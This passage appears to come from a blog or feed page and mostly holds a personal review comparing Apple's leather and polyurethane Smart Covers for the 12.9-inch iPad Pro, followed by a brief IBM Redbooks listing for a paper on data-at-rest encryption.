Moreover, I have used the polyurethane version since the Fall of 2015 and it has only rarely failed as a stand — and when it did, it was often because I wasn't placing it on a flat surface, or I was applying what was really unreasonable pressure to the screen.  I've been using the leather Smart Cover for a few weeks now, and there have been two times when I felt the triangle of the stand start to slip as I was using it.  Admittedly, both times, I was probably applying more pressure than was necessary.  The magnets holding the Smart Cover to itself just seem a little bit less strong on the leather version.

I don't mean to suggest that the leather version doesn't work as a stand.  It does work, and it works well.  But the polyurethane version works better. 

Durability.  Since I started with the bad news about the leather version, I'll move on to the other potentially negative issue.  If you spill something on the polyurethane version, you can just wipe it off.  But with the leather version, you can potentially stain the leather.  I've never had this happen to me in my many years of using leather Smart Covers on a 9.7" iPad, but I've heard other folks mention it as a reason that they prefer the polyurethane version.

The two materials also wear differently.  Polyurethane maintains the same look over time.  Leather ages over time, and can change color, especially in areas where the oils from your hands touch the case more often.  I actually consider this a feature of the leather version, not a shortcoming; to me, it gains personality over time.

Look and feel.  The main reason that I prefer the leather case is the way that it feels.  The polyurethane Smart Cover has a slightly sticky feel to it.  Even after using the polyurethane version for well over a year, I never really got used to it.  As soon as I went back to the leather version a few weeks ago, I was instantly happy to return to the feel of leather.  It feels great to the touch, the same way that leather seats in a car are nicer than seats with a plastic-y feel.

I also think that the leather looks much nicer too.

Colors.  For the older 9.7" or newer 10.5" version of the iPad, you get more color options with polyurethane.  I see that Apple currently sells seven 10.5" polyurethane colors:  Mist Blue, Pollen, Flamingo, White, Pink Sand, Midnight Blue and Charcoal Gray.  (You get eight options with the 9.7" Smart Cover.)  But with the 12.9" polyurethane Smart Cover, your only color choices are White and Charcoal Gray.  I'm not sure why Apple considers color so much less important with the larger model.

With the 12.9" leather Smart Cover, you get three color choices:  Saddle Brown, Midnight Blue and Black.  (The 10.5" leather Smart Cover has a fourth color:  Taupe.)

Ultimately, it doesn't matter how many different colors are offered.  All that really matters is whether there is a color that works for you.  I prefer a dark color, which is available in both leather and polyurethane.  But I prefer the Black leather to the almost-but-not-quite-black Charcoal Gray polyurethane.  In the following picture, the polyurethane model is on top of the leather model:

Of course, if White, Saddle Brown or Midnight Blue is the best color for you, then you can make your selection accordingly.

Conclusion

After spending over a year using a polyurethane Smart Cover, I'm happy to be able to return to a leather Smart Cover.  For me, it looks and feels so much nicer.  I wish it was 100% as strong a stand as the polyurethane Smart Cover, but it is more than strong enough.  The extra $20 is worth it for something that I carry around every day, and thus feel and look at every day.

If you are in the market for a 12.9" iPad Pro, or really any iPad for that matter, I encourage you to get a Smart Cover.  They add protection and live up to the "smart" in their name by cleverly folding up into a stand and getting out of the way quickly when you don't need them.  And best of all, now you once again have a choice of leather or polyurethane for the 12.9" version.

Click here for the leather 12.9" Smart Cover from Apple ($79.00)

Click here for the polyurethane 12.9" Smart Cover from Apple ($59.00)

Categories: iPhone Web Sites

Data-at-rest Encryption for the IBM Spectrum Accelerate Family

IBM Redbooks Site - Tue, 07/11/2017 - 09:30
Redpaper, published: Tue, 11 Jul 2017

With the ever-growing landscape of national, state, and local regulations, industry requirements, and increased security threats, ensuring the protection of an organization's information is a key part of operating a successful business.

Categories: Technology
